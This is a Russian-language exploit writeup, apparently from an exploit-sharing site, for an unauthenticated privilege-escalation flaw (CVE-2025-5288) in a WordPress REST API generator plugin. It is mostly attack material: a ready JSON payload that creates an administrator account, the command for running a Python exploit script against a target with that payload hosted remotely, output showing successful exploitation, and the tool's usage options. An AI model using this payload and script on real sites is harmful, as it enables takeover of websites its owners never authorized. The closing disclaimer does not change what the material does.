
Wordpress REST API | Custom API Generator For Cross Platform And Import Export In WP 1.0.0 - 2.0.3 - Отсутствие авторизации, ведущее к неаутентифицированному повышению привилегий
Плагин REST API | Custom API Generator For Cross Platform And Import Export In WP для WordPress уязвим к повышению привилегий из-за отсутствия проверки прав доступа в функции process_handler() в версиях 1.0.0 to 2.0.3. Это позволяет неаутентифицированным злоумышленникам отправить специально созданный файл user.json на открытую конечную точку и создать новую учетную запись Администратора.
[
{
"author_data": {
"post_author": "Nxploited",
"post_author_email": "[email protected]",
"post_author_role": "administrator"
},
"title": "Nxploited (Khaled_alenazi)",
"content": "Nxploited (Khaled_alenazi)"
}
]
python3 CVE-2025-5288.py -u http://192.168.100.74:888/wordpress/ -json http://192.168.100.74:888/user.json
[+] Target appears vulnerable (version: 2.0.3) - exploiting...
[*] Fetching JSON payload from: http://192.168.100.74:888/user.json
[+] JSON content loaded successfully:
[1] {
"author_data": {
"post_author": "Nxploited",
"post_author_email": "[email protected]",
"post_author_role": "administrator"
},
"title": "Nxploited (Khaled_alenazi)",
"content": "Nxploited (Khaled_alenazi)"
}
[*] Launching exploitation...
[+] Exploit delivered successfully.
[+] Payload Sent:
[
{
"author_data": {
"post_author": "Nxploited",
"post_author_email": "[email protected]",
"post_author_role": "administrator"
},
"title": "Nxploited (Khaled_alenazi)",
"content": "Nxploited (Khaled_alenazi)"
}
]
usage: CVE-2025-5288.py [-h] -u URL -json URL_JSON [--proxy PROXY] [--timeout TIMEOUT] [--no-verify] [--no-sleep] [--debug]
Неаутентифицированное повышение привилегий - от Khaled Alenazi (Nxploited)
options:
-h, --help показать это справочное сообщение и выйти
-u, --url URL Базовый URL сайта WordPress (например, http://target/wp/)
-json, --url_json URL_JSON
URL до размещенной полезной нагрузки R.json
--proxy PROXY URL прокси (например, http://127.0.0.1:8080)
--timeout TIMEOUT Тайм-аут HTTP в секундах (по умолчанию: 10)
--no-verify Отключить проверку SSL-сертификата (НЕ рекомендуется!)
--no-sleep Отключить задержки для более быстрого выполнения
--debug Включить отладочный вывод
Этот инструмент предназначен только для образовательных и авторизованных целей исследования безопасности. Несанкционированный доступ к системам без разрешения незаконен.
Автор: Nxploited (Khaled_alenazi)